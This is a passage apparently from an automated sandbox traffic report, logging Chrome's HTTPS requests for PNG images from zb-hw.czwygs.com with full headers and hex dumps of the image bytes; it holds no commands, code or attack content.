                                                                                                                                                          Data Ascii: Cw#lQRALlMxFHPbX:>DIS#A=`V$8~lVr)olG)RynzA9Y`NjB^rmtl"8JR>B&!5dE"%8y `YvXIt*Mq|7 EAeue\!'QeI>Lr{\P
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 25 0a 24 9d 39 47 8f 1e cb f1 28 92 a5 65 67 6f af b0 72 ff e4 27 3f 46 28 12 c1 f4 cc 34 b2 99 2c 7a b6 f5 a0 b1 a1 11 b7 de 76 2b 7c 24 af 58 e6 e0 02 3e 36 36 66 69 8a a2 28 31 47 2f 8e d9 c9 f3 98 9d 39 8d 86 a8 17 a9 99 34 a2 b5 5b 10 da 74 13 a0 d6 48 7d 19 6a af cf 3f f7 9c bc 30 24 4a 20 a3 f6 89 e3 27 a4 1f ff f4 4f ff 24 8c e1 cc a9 3d 7e ec 18 de 78 f3 4d 61 ca 21 0f 24 f3 67 7d 7e bf 65 a7 cc 37 2d ac d1 1c 50 5c 68 2c 0d 8b 91 7b 0e 9f 22 d2 33 98 1d be 28 fc 1e b1 ac 8e d6 9e 1d 48 27 bd 38 7a e2 1c c2 b5 8d a2 99 fc fc 85 9f e3 7f fd 93 03 e8 6c e9 10 92 59 82 06 83 f5 09 7e f5 f5 f5 78 f6 b9 67 f1 e0 fe 07 65 6b 4d 2d 9d 84 10 d4 8c 2b ce 92 e3 74 d0 71 48 88 b5 8e 25 07 d2 98 9f 1a 43 32 1d 13 4d 8c 5a 5e b4 36 02 23 1b 97 79 d2 0c 15 81
                                                                                                                                                          Data Ascii: %$9G(egor'?F(4,zv+|$X>66fi(1G/94[tH}j?0$J 'O$=~xMa!$g}~e7-P\h,{"3(H'8zlY~xgekM-+tqH%C2MZ^6#y
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: bd 06 b7 d1 4b d9 e2 58 94 ae 8e 5c c8 ab ec 11 99 49 7d df 7a 37 eb 90 06 11 03 0e a0 e8 77 a6 68 d6 1f 2d 2b 0f f1 76 0d f7 2b aa 2f 85 9d ae 57 50 ba 29 e9 14 ec ee 4b ab ef 8a 1b 70 87 32 e1 40 9b d0 16 3a a0 c8 34 05 9c a3 dd f6 7c 8a 63 f3 b9 fc 5d dd 0a a5 98 5b 1a 2f df 61 24 69 fe ab 69 e8 8d 97 30 96 40 6f 79 00 dc b0 9c 2d 84 a2 82 6f 27 29 bf 6e 77 b8 48 29 f5 f3 40 aa 72 53 b8 6c a6 7a ec 47 d9 b1 2d 89 7c 99 0a c2 35 41 fb 39 46 f9 a7 a3 ff 2d dd 7a 73 f7 de 04 85 a8 87 2f 0d c5 b5 c6 aa b9 f9 fa 71 47 4b cf bb ba d5 50 cc 1a af 85 62 f6 a0 2a 0c 9d e9 05 64 4a 01 17 92 ee d5 6c 21 14 dd d3 ba d3 0b e4 99 a8 ba 6c 33 21 d2 f3 a6 e6 6c a0 f5 ac a6 33 e5 f3 55 af aa ac 3c 53 75 2b 94 97 02 05 d3 59 cb eb 0e 37 d4 f5 aa 60 b9 17 c0 71 3b 87 24
                                                                                                                                                          Data Ascii: KX\I}z7wh-+v+/WP)Kp2@:4|c][/a$ii0@oy-o')nwH)@rSlzG-|5A9F-zs/qGKPb*dJl!l3!l3U<Su+Y7`q;$
                                                                                                                                                          2024-06-09 22:41:04 UTC363INData Raw: 79 cb 5c 6b 99 63 f4 b3 cd 56 03 2c 4f 05 f5 53 de 6e db f6 ba 96 b2 fe 44 ff 1c bd 8e 5b 76 fb 32 4a b4 5f 68 f7 03 ec 9e f5 3c ea c6 dc f3 84 9b b8 41 af 6b e9 b5 be 5b d1 36 0b 64 bd 80 db 4f 75 f5 73 7d fd 6c bb d5 90 ea b7 6c fd d4 d1 30 30 19 d5 79 38 ce a8 00 93 57 a6 7e 8f 3d cc 31 b6 0a b0 fd bc 44 86 be fe ed 6a 80 a3 6c 60 83 c2 cc dd 6f 33 ea a1 9f 63 96 d9 b6 cc 36 a3 a8 8b ad ba 37 45 e7 19 f6 3a 07 2d ff d0 0f d3 a0 27 ee 73 bf 61 cb 59 66 ff 32 db f4 ab e6 fa b9 cc b2 e7 2f bb 5d 3f e7 7e 41 f4 3e f7 75 41 25 37 1e e6 c1 1b 66 df 92 c5 eb d8 6c 54 e7 1b e6 38 c3 ec 3b c8 35 bf d8 f7 19 e6 61 1e 66 df 7e 14 d7 a8 ef c1 30 e5 1e 66 df be af 63 dc d8 8b ab 6c d4 75 33 ea e3 f5 7d b3 fb dc e1 85 56 de 3e 2f 6f c7 6c be a5 0f fc 08 ae 7a d4 e5
                                                                                                                                                          Data Ascii: y\kcV,OSnD[v2J_h<Ak[6dOus}ll00y8W~=1Djl`o3c67E:-'saYf2/]?~A>uA%7flT8;5af~0fclu3}V>/olz


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          258192.168.2.55001290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:03 UTC641OUTGET /pc/image-pc/index/312/app/02.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC627INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:03 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 98341
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:25 GMT
                                                                                                                                                          ETag: "5d71fe69-18025"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[6],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,4],EU-GER-frankfurt-GLOBAL1-CACHE10[13],EU-GER-frankfurt-GLOBAL1-CACHE4[0,TCP_HIT,11],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1698781
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: f38c37aa382e14b7409aea681a24eafc
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 893219
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:03 UTC15757INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 14 00 00 01 a2 08 06 00 00 00 26 e3 39 11 00 00 20 00 49 44 41 54 78 5e ec bd 07 98 5d 67 75 2e fc ee de 4e 3f 67 fa 68 66 24 8d ba 2c d9 b2 2d b9 ca 72 37 36 60 8c 0b 09 26 c4 80 c1 14 73 a9 26 24 fc 01 51 f2 98 40 92 9f 40 08 89 73 13 e0 9a 40 62 93 42 0f 86 60 d9 b8 77 cb 96 6c f5 19 4d 9f d3 db ee e5 3e eb db 33 d8 86 70 03 79 90 64 89 b3 fd cc 73 3c 9a 33 7b 9f 59 df de ef b7 d6 bb de b5 16 87 ce 71 42 59 60 fb db de a6 63 ef 5e 77 6d 57 57 f4 e3 6c 96 ef bf ed b6 60 3b 10 9e 50 7f 64 e7 8f 79 d9 5a 80 7b d9 7e b2 ce 07 fb 95 2d 70 fd f5 af 48 b9 6e a2 3d 34 24 66 0d 51 b9 3e 97 cb a9 12 27 cc 14 e7 ab cb 74 bd b0 ab 52 ac ff 38 b5 64 09 5f 79 ee 39 fb cf 6e bf bd fd 2b 9f b8 f3 c6 8e 05 7e 4d
                                                                                                                                                          Data Ascii: PNGIHDR&9 IDATx^]gu.N?ghf$,-r76`&s&$Q@@s@bB`wlM>3pyds<3{YqBY`c^wmWWl`;PdyZ{~-pHn=4$fQ>'tR8d_y9n+~M
                                                                                                                                                          2024-06-09 22:41:03 UTC16384INData Raw: 84 07 ee 7f 1a 92 42 82 48 05 6b 57 ad c4 3b df f1 56 0c f5 77 43 55 38 84 6e 0b 87 c7 0f 60 e7 fe 89 d6 a4 27 7f f8 e6 8f 7d e9 8b bf d5 80 52 6d b9 27 97 7c e9 1b c5 9a bd 9a 76 98 c1 41 19 73 95 38 0b 41 3a 2c 72 a9 19 57 42 61 2e 29 3d 22 1a 40 1e 32 ce 84 b2 2c 61 c0 b1 f4 2a dd 58 8a 46 a1 50 fc 7e ca 34 0c e8 40 81 78 05 3b 64 ed 11 69 17 ff 65 b2 7c da 8c 68 1d 5f a4 40 87 42 9a a2 08 b8 fd ab 77 e0 4b 7f f3 45 1c 3e 3c 06 db 21 ee c4 61 29 50 12 23 f5 76 e9 c8 77 65 18 79 49 ed 1a 4b f5 16 6a 2d 60 60 e5 2a bc f6 8d ef c4 35 6f 7c 27 38 55 c4 e4 81 32 d6 74 e5 90 16 23 96 89 d1 35 0b 73 c5 9d ac 6e 27 a5 2d 81 26 67 20 68 32 10 b5 e0 85 35 96 e5 41 90 01 8f 34 04 4e 00 85 81 56 04 b4 42 e2 96 80 32 b5 6f a4 b0 86 6e 56 39 f6 50 64 2d fe fc b4 cb
                                                                                                                                                          Data Ascii: BHkW;VwCU8n`'}Rm'|vAs8A:,rWBa.)="@2,a*XFP~4@x;die|h_@BwKE><!a)P#vweyIKj-``*5o|'8U2t#5sn'-&g h25A4NVB2onV9Pd-
                                                                                                                                                          2024-06-09 22:41:03 UTC16384INData Raw: ec f3 c1 21 ba a1 6b 3c a6 a6 72 48 e6 ab e8 d9 37 8a 9e 7d fd 48 a4 52 08 d5 45 50 5f 5f 77 e3 af 1f 79 f4 9b 6f 1a b9 bc cd ef ee b1 0d 3b 7e 24 b8 23 97 9a 0e 3f b7 63 df 10 c6 62 d3 98 37 6f 01 3c 8a 8c 90 5d 42 77 8b 0d 6e 03 e0 c8 98 da ac d4 0c 9f ff 44 41 a9 bd 35 19 14 51 60 ba c9 a6 27 f9 5c 06 57 5e 71 19 36 6d dd 82 b2 e4 c2 79 17 5c 8c 8b 3e 71 35 36 bd f4 12 be f3 f5 6b 10 f2 28 28 5b 02 8e 3f e5 34 9c f3 ee 7f 04 2f 8a 88 47 c7 f0 b3 fb ff 13 7d 7d 3b 58 f7 b0 60 f1 51 b8 e3 8e bb b0 78 8e 8f b9 d7 c5 c6 13 c8 65 f2 ac 1b a1 30 70 2a 2a 54 dc 78 96 fb cb c1 d2 2d 18 26 a9 99 0c 54 38 01 93 05 1d c3 c9 02 aa 52 00 f1 8c 0a b5 48 e9 83 24 46 ac 09 2f 39 49 84 5b b4 d0 e6 93 51 22 2c 6b ba 88 50 28 80 a6 7a 11 c3 a3 a3 d8 33 92 46 53 c8 57 71
                                                                                                                                                          Data Ascii: !k<rH7}HREP__wyo;~$#?cb7o<]BwnDA5Q`'\W^q6my\>q56k(([?4/G}};X`Qxe0p**Tx-&T8RH$F/9I[Q",kP(z3FSWq
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 3b b4 76 d6 d5 b0 02 a7 00 65 f2 d1 7f cd c6 38 ef 70 3a a2 a6 03 a7 83 fc e2 0c e6 17 97 30 b7 58 c1 f8 05 97 63 a6 6a d9 91 cc ba 9f 7b f5 1b df 78 c7 b3 3f d8 fd 5f fb ec b5 a3 e9 e8 dd e4 e6 55 af d5 51 6a b6 21 c6 fb ff f0 55 bf f4 9b 7f b2 1a 16 81 ae f1 c8 a2 f5 53 56 80 2f d7 5d bf 5f 8e 6a 4c fe d0 e5 3c 96 62 30 9e 08 38 16 95 90 95 85 4d 76 21 81 c7 74 60 09 4c 2a 55 1b d5 96 07 cf e5 19 e7 64 38 a1 61 43 92 c3 f9 c3 02 a3 bc 93 24 0a ed 39 b6 69 7b 00 b5 22 c5 48 67 27 d0 62 1a 25 9e 0b c7 ea 9e e2 a9 b4 79 0d 87 8b 36 aa 2e 0f dd 10 e0 07 1e f3 39 0e c5 91 02 06 28 9d 36 89 5f 53 8a 42 5f 3d 50 1f 97 c9 20 44 05 36 b4 a7 8a 01 2b 0c 0f 1b 22 6b 65 33 35 a7 15 b9 82 e0 69 a5 bd d3 ef 13 73 f8 58 19 12 ec d8 90 0c 19 c5 36 f0 c4 89 25 54 fc 00
                                                                                                                                                          Data Ascii: ;ve8p:0Xcj{x?_UQj!USV/]_jL<b08Mv!t`L*Ud8aC$9i{"Hg'b%y6.9(6_SB_=P D6+"ke35isX6%T
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: f6 90 1e aa 98 e2 0d 05 05 d5 23 b0 52 be cb 8d 71 24 1f 07 cc d2 07 cb 26 7c 1c a0 10 c1 4e 11 15 46 98 70 44 46 67 47 3b 4e 3b ed 54 bc fd d6 6c 94 45 aa 70 c7 fd f7 61 b7 dd 26 e2 dc b3 cf c7 3d f7 dc 83 d3 ce fa 39 ae bc e6 77 88 75 a4 38 ba fb f7 3d 77 63 ec e8 26 54 57 86 f1 d2 cc e7 30 e3 e1 e9 7f ee 9a bb e0 92 d5 40 49 b6 60 f3 c5 85 4d 3e b2 21 0f 28 34 72 47 1d b1 df 71 3f 3c 62 f7 7f 8e aa 0b 87 2b 3c 3e 07 50 34 85 01 85 bc 8d e9 29 4d 80 42 dc 10 e2 8b 90 da 3c 2f 7d b8 77 86 a8 f3 85 12 32 3f ea 1d 40 71 9e fa 36 47 27 66 0e 48 24 0d 18 c4 2d b1 33 2c e4 44 f6 3f dd 71 a0 6e 9b dd 50 56 db f4 53 dd a7 ff 6b 93 af 62 e1 83 f3 de 58 74 90 e5 09 3d 14 2a 2b d3 35 3f 49 41 8a 5c be a5 8d 00 c5 35 11 73 a3 14 77 29 e4 b8 f3 0c 98 a9 17 47 28 83
                                                                                                                                                          Data Ascii: #Rq$&|NFpDFgG;N;TlEpa&=9wu8=wc&TW0@I`M>!(4rGq?<b+<>P4)MB</}w2?@q6G'fH$-3,D?qnPVSkbXt=*+5?IA\5sw)G(
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 87 f6 4d e4 a8 7f 34 47 d9 92 4d db 9e dd 42 1d cd 06 9d 79 72 db b5 df ff fc cd df 22 da 68 01 08 01 9e 78 3e 42 71 29 07 02 93 3a c8 1c 45 40 7c 41 13 e8 28 ee cf f1 de f4 e1 8e 87 b4 62 c5 0a 69 d9 39 cb be 9f 88 37 be fd 94 d3 4e a5 86 e6 26 1a 2f 94 49 8f 36 50 b9 e4 90 53 b6 48 23 99 b4 90 44 ba 11 a0 a6 c6 38 f5 0f e4 a8 e7 d9 3d b4 61 f3 26 ea d9 be 85 f4 b0 46 9d 9d b3 69 78 68 3f a9 4e 85 e6 b6 b5 50 98 2a 9f fb c2 17 be b2 12 13 7c 12 1c dc c9 ed 3e 26 a7 f8 e2 c5 8b 0f 69 bf 27 c1 64 13 75 77 77 4f f9 ce b6 6d 6e f1 b4 c5 8b 17 d7 4c 38 20 50 0d ea d0 26 fa db cb af bd 71 e3 86 2d 6f ef 68 9f 47 a7 2f 39 97 66 cd 5f 40 25 3b 40 e9 8c 49 63 39 93 24 3d 42 a9 86 76 aa 14 14 da b1 6b 90 36 ec dc 4b d9 62 89 74 4d a1 68 a8 4c 67 9f 92 a4 25 0b 1a
                                                                                                                                                          Data Ascii: M4GMByr"hx>Bq):E@|A(bi97N&/I6PSH#D8=a&Fixh?NP*|>&i'duwwOmnL8 P&q-ohG/9f_@%;@Ic9$=Bvk6KbtMhLg%
                                                                                                                                                          2024-06-09 22:41:04 UTC664INData Raw: 50 ca e7 d0 b9 6c 9a cf 52 ba 47 64 88 8b 94 1a 64 56 33 7e 21 f3 c3 c3 1f 07 28 80 02 55 a3 8d 9f 03 f0 5d d0 e1 3b a3 4c 72 a3 64 07 68 7c 14 82 74 d2 04 2d f6 bd 53 96 05 76 d7 6b d9 46 59 c2 80 c0 74 6d 23 5e 91 e0 96 3b 98 94 d9 64 32 29 03 9a 79 b8 5e e0 a0 ec ae f4 52 fa 94 7a 4b 31 0c cd 2f 9a c9 4b 8a c3 e3 1f ba bf e7 cf 9f c7 bd bc 7a f5 2a 62 67 69 32 9a 0e 77 01 c1 32 80 59 b6 aa 6f e4 79 9d 3b dd 5f 5e fa 2e e5 98 eb 12 a9 7c 72 8d 5e be 7c 19 0d 3a 35 d0 7c 2e 72 59 1b 3f 4c 74 49 4d ba 1a ba d7 97 8f 30 69 a4 a9 84 0e f6 b8 55 c4 6e ca ba 46 d2 b3 35 a9 1e b7 af fd 97 5f e6 d9 69 be 4e d3 b9 ba 8e db a1 cc 1c 9a c5 7d 05 2c 28 a3 3e 6b ea c7 21 53 ab 4b 56 ed 23 5f 14 07 d0 00 1e 6c 02 88 5f b3 c5 95 71 d3 1e 24 cb 34 92 ca 39 5d 3a e2 05
                                                                                                                                                          Data Ascii: PlRGddV3~!(U];Lrdh|t-SvkFYtm#^;d2)y^RzK1/Kz*bgi2w2Yoy;_^.|r^|:5|.rY?LtIM0iUnF5_iN},(>k!SKV#_l_q$49]:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          259192.168.2.55000990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:03 UTC641OUTGET /pc/image-pc/index/312/app/03.png HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4091.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:03 UTC628INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:03 GMT
                                                                                                                                                          Content-Type: image/png
                                                                                                                                                          Content-Length: 325680
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Fri, 06 Sep 2019 06:36:26 GMT
                                                                                                                                                          ETag: "5d71fe6a-4f830"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE1[6],EU-GER-frankfurt-EDGE5-CACHE5[0,TCP_HIT,4],EU-GER-frankfurt-GLOBAL1-CACHE14[20],EU-GER-frankfurt-GLOBAL1-CACHE5[0,TCP_HIT,15],1.1 google
                                                                                                                                                          X-CCDN-Expires: 1698781
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 450fabc2d9336f081478bf959ca2db8f
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 893219
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:03 UTC15756INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 86 00 00 04 48 08 06 00 00 00 9f b8 10 87 00 00 20 00 49 44 41 54 78 5e ec 7d 09 98 24 45 95 ff 8b cc ac aa 3e a7 af 39 ba e7 6a 06 18 60 1c 05 95 11 f0 00 64 95 f5 53 d6 03 8f 11 75 45 70 5d 51 44 3c 16 f0 5c c5 6b 5d f0 c6 dd f5 d8 f5 f8 ab e0 7d a0 a8 2b 1e 78 ef ae 3b e8 a2 8e 1c c3 d5 73 f6 1c 3d d3 3d 7d 55 55 1e f1 ff 7e 2f 22 32 b3 b2 aa 3a ab ba ba 67 ba 67 2a f9 e6 2b ba 2a 33 32 e2 45 c4 8b df bb 05 35 af 79 a0 80 14 f7 dc 73 a0 63 a0 3d 9b 71 6d 77 85 cc 38 ad 36 89 01 4f ca 36 cb a1 93 a4 14 6d 96 65 af 14 44 2d 42 50 bf 14 94 25 49 dd 24 28 43 52 b4 11 91 2d 84 cc 91 24 4b 12 d9 44 24 4c 27 65 f8 7f fa 1b 89 9f a3 ab ec f7 94 d1 09 f2 e7 61 fc 8b a7 49 29 65 43 9d 15 22 39 21 0d 35 b7
                                                                                                                                                          Data Ascii: PNGIHDRH IDATx^}$E>9j`dSuEp]QD<\k]}+x;s==}UU~/"2:gg*+*32E5ysc=qmw86O6meD-BP%I$(CR-$KD$L'eaI)eC"9!5
                                                                                                                                                          2024-06-09 22:41:03 UTC16384INData Raw: bc 03 10 a5 ec 16 dd 89 e9 62 f1 b6 42 7e 62 c8 13 53 1f bc 60 d3 99 23 cd 00 94 b9 59 f5 f3 dd ca 82 02 86 00 85 7f fc e3 de b6 de de d6 01 ab 45 7c 90 28 58 eb d8 ce c6 8c 6d 67 15 30 54 be 83 c8 ef 87 8b b5 86 3a 32 17 9a 32 00 43 95 a6 a6 32 d9 cc f7 ec 43 01 f5 77 e0 d3 2f ee f8 19 03 a7 77 bf fb dd ac a1 03 e0 31 e6 8f 4a ad a4 1d 84 71 46 0f 5f b9 5f fd ea 57 73 0a 0c c1 c8 60 d2 78 ea 53 9e 4a 27 9e 74 22 fb 16 a2 cf cf 7b fe f3 98 21 20 ff e2 8a e5 2b e8 ec 73 ce 66 4d e8 cb 2e 7d 19 ed dd b7 97 cd d7 30 81 c0 b4 dc d5 dd c5 26 07 30 01 80 3a b4 79 da 86 d3 d8 e4 fd 85 ff f7 05 66 e0 08 5e c9 e7 51 03 5d e5 34 44 b4 35 7c 0a 39 b9 b8 65 b1 6f 63 5f 6f 1f 6d 7e e1 66 66 80 d0 86 c2 d7 e6 c6 0f dc 48 a3 87 46 69 e4 e0 81 04 f9 aa 2d b5 08 18 32 b8
                                                                                                                                                          Data Ascii: bB~bS`#YE|(Xmg0T:22C2Cw/w1JqF__Ws`xSJ't"{! +sfM.}0&0:yf^Q]4D5|9eoc_om~ffHFi-2
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 13 06 5b 63 78 35 05 a9 7a c5 54 60 89 03 ba fa 0d 32 20 83 dd 70 c1 cd d8 42 33 c3 ed 31 d5 d7 d1 5d 3b 81 5e 12 74 19 80 99 de ef 91 b1 2d 17 0b d4 78 c2 47 12 c1 55 cd c7 95 c5 c4 82 8e c0 d8 a7 8e 47 64 7d 63 53 0e 0e da 4c 73 1e 76 da 64 b8 cc a2 88 c1 c9 f3 42 b3 f3 b7 b9 9c b5 48 e1 e7 db 73 e1 06 ce 74 b5 b1 26 d5 fd 9e 29 66 57 98 62 e9 67 bf 47 b8 31 8f 59 60 68 c0 df 07 ef 3e c3 65 e0 20 cb 50 1e 07 08 ef b4 d1 18 b9 0e 3b 13 64 2d 8c c8 73 ac 8b f9 21 c7 bb 51 2d c9 fc cc 14 59 c3 5e a4 55 9d e6 5d 88 40 87 ea d9 5b ab 6b d2 ea 45 b2 b1 bd ef 0a 24 74 de 20 30 fa c7 91 4d 1d c0 a3 a7 19 f6 d7 0c 06 66 af 4a 9f 0c a4 2b 8c b2 8d 46 3e a7 16 50 96 b1 80 a1 3a d6 1f cc 2f 00 45 f3 c6 34 60 e8 b3 c3 09 70 b9 f3 c6 c0 3f 7f 7f 7d 18 35 8e fe d5 ea
                                                                                                                                                          Data Ascii: [cx5zT`2 pB31];^t-xGUGd}cSLsvdBHst&)fWbgG1Y`h>e P;d-s!Q-Y^U]@[kE$t 0MfJ+F>P:/E4`p?}5
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 54 a3 6b 63 bc c1 74 95 fe 99 f7 59 ba b2 d7 69 b3 30 ac 51 47 a5 fc b4 7c d7 77 ff 2d a6 d5 b1 a9 c4 ad 81 33 03 36 76 78 5e c0 d8 43 62 83 d4 70 0e 05 4a c3 50 26 6a 15 29 e6 22 d9 dd 5c a7 2d d3 ce d6 ba 14 c8 80 22 95 8b e7 a8 43 df d7 30 84 66 17 c5 1a 0a b3 21 2b c0 bc d3 8a 7a 05 66 a9 e7 c8 d8 3b ce b1 a4 55 63 76 96 80 d9 f7 e7 8e 82 42 f5 5f 24 08 f4 ec 76 38 ac b0 2b 72 60 92 23 e3 7a c7 a3 5a 5b c1 a9 1a 55 c7 40 d5 49 53 d8 ca 10 1b a0 3c 9c 30 a0 17 d6 f5 86 72 16 fc 8f 15 c9 a8 08 2f 51 a6 81 cd 0b 18 45 82 55 4a 17 0c 14 a6 7d 41 63 60 08 af db 94 0d 92 5e 69 cc 72 5b 5f 70 cb c4 0d 90 09 41 15 fa 40 a6 a6 97 e5 17 fe 87 a7 a3 99 85 b3 32 37 af a9 64 fd 2c e8 96 ef 33 86 c7 ac 2c 6f a8 5f bf a1 19 43 f3 19 a3 d7 9a b3 ab f9 3b ef fb 09 b9
                                                                                                                                                          Data Ascii: TkctYi0QG|w-36vx^CbpJP&j)"\-"C0f!+zf;UcvB_$v8+r`#zZ[U@IS<0r/QEUJ}Ac`^ir[_pA@27d,3,o_C;
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: a5 34 e2 b8 f4 46 48 7f de 5c 7f 26 2e fc 62 aa 5a 5f 20 f5 d0 8d 7c 7b 94 73 2d eb 31 7a 59 20 66 89 93 53 6f 6a 1a 8b 4e 44 f3 84 f6 6a 04 0c eb d0 ac cf c3 b7 be e6 bb 61 7a 72 19 9e 78 fc d5 e4 1d 70 bd 18 56 ef 5e 81 8f 7e e2 8f e0 ce dd 4b 70 e3 f6 05 9c 65 00 9e 88 a9 e6 83 fb c3 66 af 76 ea 01 49 c6 a0 a5 5f 92 e7 ca 78 00 b2 6d 9f 65 20 59 c0 3f db 63 b6 18 53 bd 7f b9 4d f4 d0 80 dd 62 f0 cb ce af f4 fd 47 0b 9d 30 bd 4f 59 41 7b d3 7b 12 38 94 12 37 c3 84 f5 b9 7f 19 18 66 d4 0b 62 0f fa 41 0c 53 33 c7 e0 27 9f fc 55 02 86 f3 f3 58 12 6f cc 18 8e 3a 2e 1e f4 f3 0f 24 30 dc 68 5d a0 a4 13 32 2e d2 a5 65 13 1e d5 3b 7a af 80 21 66 25 a3 2b 59 00 c3 2a dc bc be 0a 6b ab 2d 78 ea a9 af 50 ac d0 d2 f2 1c 34 26 ab f0 a6 37 7f 1b 4c 4d d7 a0 dd 6e 41
                                                                                                                                                          Data Ascii: 4FH\&.bZ_ |{s-1zY fSojNDjazrxpV^~KpefvI_xme Y?cSMbG0OYA{{87fbAS3'UXo:.$0h]2.e;z!f%+Y*k-xP4&7LMnA
                                                                                                                                                          2024-06-09 22:41:04 UTC16384INData Raw: 79 31 01 39 8f fe 87 70 ce 23 60 e8 f5 27 48 0e 69 6a ea 30 04 a1 0f 17 af 5d 81 ad 6e 0b 5a ed 1b e0 d6 3a f0 f8 b7 3c 04 51 dc 1d 03 43 d9 c0 63 60 28 e7 d1 18 18 96 31 75 07 f6 9c 7d 0f 0c 79 a7 c6 8c e1 ff f5 a1 df 26 b9 1a 01 0c 63 a8 fa 22 d8 5f 3f a8 a6 b0 e2 da d1 8b ad 17 fe 46 61 92 04 70 90 9a 7a 43 32 83 f5 05 d1 f6 b7 2e 80 bb f3 e4 82 e1 ae f4 64 a7 8b 8c ad d4 c7 63 65 7b 04 2f 2f 39 f3 38 44 a1 03 17 cf df 82 8d f5 2d b8 76 fd 0a d4 9b 0e 1c 3b 31 07 f5 46 05 ba ed 61 ee 7a 73 c1 7b d5 c5 4b 4c b0 cc 8c 53 d9 bd a1 7d 80 8c 88 04 6c d4 a6 86 18 c3 58 ee 98 d5 40 7f f5 ba 19 c6 96 24 61 b2 72 2c 6a eb 09 f6 45 7c 82 f2 31 28 db b3 72 e4 28 65 68 57 aa 75 02 7e e7 cf 3d 0f 83 60 00 33 33 33 e4 d6 46 dd 41 f4 5a 6f 6c 6e d0 ef 28 61 54 be af
                                                                                                                                                          Data Ascii: y19p#`'Hij0]nZ:<QCc`(1u}y&c"_?FapzC2.dce{//98D-v;1Fazs{KLS}lX@$ar,jE|1(r(ehWu~=`333FAZoln(aT
